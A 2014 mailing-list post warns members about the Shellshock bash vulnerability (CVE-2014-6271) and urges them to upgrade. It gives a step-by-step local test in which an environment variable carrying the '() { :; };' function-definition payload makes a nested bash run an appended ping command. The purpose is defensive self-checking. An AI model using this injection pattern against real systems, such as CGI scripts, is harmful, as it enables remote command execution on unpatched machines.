[colug-432] Newly-announced bash security hole

Rob Funk rfunk at funknet.net
Wed Sep 24 19:46:13 EDT 2014


Big bug announced today:
  https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271

If you haven't patched your bash today, check this out:

1. Start a new bash subshell.
    $ bash
2. Export a new specially-crafted environment variable:
    $ export FOO='() { :; }; /bin/ping -c 3 127.0.0.1'
3. Start a new bash sub-subshell (under the first subshell):
    $ bash
4. Watch bash ping your machine:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.114 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.101 ms
64 bytes from 127.0.0.1: icmp_seq=3 ttl=64 time=0.093 ms

--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.093/0.102/0.114/0.014 ms

5. Exit the inner subshell.
    $ exit
6. Exit the outer subshell.
    $ exit

7. Imagine what could be done if a malicious person could specify what's in 
environment variables when your system starts bash.

8. Hope you don't have any bash scripts triggered by network actions, e.g. 
CGI scripts.

9. Upgrade bash.

-- 
Rob Funk <rfunk at funknet.net>
http://funknet.net/rfunk


More information about the colug-432 mailing list